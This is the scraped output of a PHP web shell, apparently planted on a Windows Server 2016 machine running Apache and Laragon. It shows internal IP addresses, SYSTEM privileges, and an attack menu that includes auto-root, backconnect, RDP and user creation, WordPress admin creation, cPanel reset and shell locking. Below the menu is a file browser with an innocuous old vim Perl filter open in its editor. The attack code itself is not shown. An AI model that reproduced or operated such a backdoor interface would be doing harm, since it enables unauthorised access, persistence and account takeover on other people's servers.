Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
git /
usr /
share /
vim /
vim82 /
tools /
[ HOME SHELL ]
Name
Size
Permission
Action
README.txt
1.11
KB
-rw-rw-rw-
ccfilter.1
2.17
KB
-rw-rw-rw-
ccfilter_README.txt
3.16
KB
-rw-rw-rw-
demoserver.py
3.26
KB
-rw-rw-rw-
efm_filter.pl
978
B
-rw-rw-rw-
efm_filter.txt
1.09
KB
-rw-rw-rw-
efm_perl.pl
3.65
KB
-rw-rw-rw-
emoji_list.vim
411
B
-rw-rw-rw-
mve.awk
484
B
-rw-rw-rw-
mve.txt
579
B
-rw-rw-rw-
pltags.pl
8.23
KB
-rw-rw-rw-
ref
137
B
-rw-rw-rw-
shtags.1
1.99
KB
-rw-rw-rw-
shtags.pl
3.27
KB
-rw-rw-rw-
unicode.vim
12.17
KB
-rw-rw-rw-
vim132
315
B
-rw-rw-rw-
vim_vs_net.cmd
798
B
-rwxrwxrwx
vimm
188
B
-rw-rw-rw-
vimspell.sh
1.43
KB
-rw-rw-rw-
vimspell.txt
819
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : efm_filter.pl
#!/usr/bin/env perl # # This program works as a filter that reads from stdin, copies to # stdout *and* creates an error file that can be read by vim. # # This program has only been tested on SGI, Irix5.3. # # Written by Ives Aerts in 1996. This little program is not guaranteed # to do (or not do) anything at all and can be freely used for # whatever purpose you can think of. $args = @ARGV; unless ($args == 1) { die("Usage: vimccparse <output filename>\n"); } $filename = @ARGV[0]; open (OUT, ">$filename") || die ("Can't open file: \"$filename\""); while (<STDIN>) { print; if ( (/"(.*)", line (\d+): (e)rror\((\d+)\):/) || (/"(.*)", line (\d+): (w)arning\((\d+)\):/) ) { $file=$1; $line=$2; $errortype="\u$3"; $errornr=$4; chop($errormsg=<STDIN>); $errormsg =~ s/^\s*//; $sourceline=<STDIN>; $column=index(<STDIN>, "^") - 1; print OUT "$file>$line:$column:$errortype:$errornr:$errormsg\n"; } } close(OUT); exit(0);
Close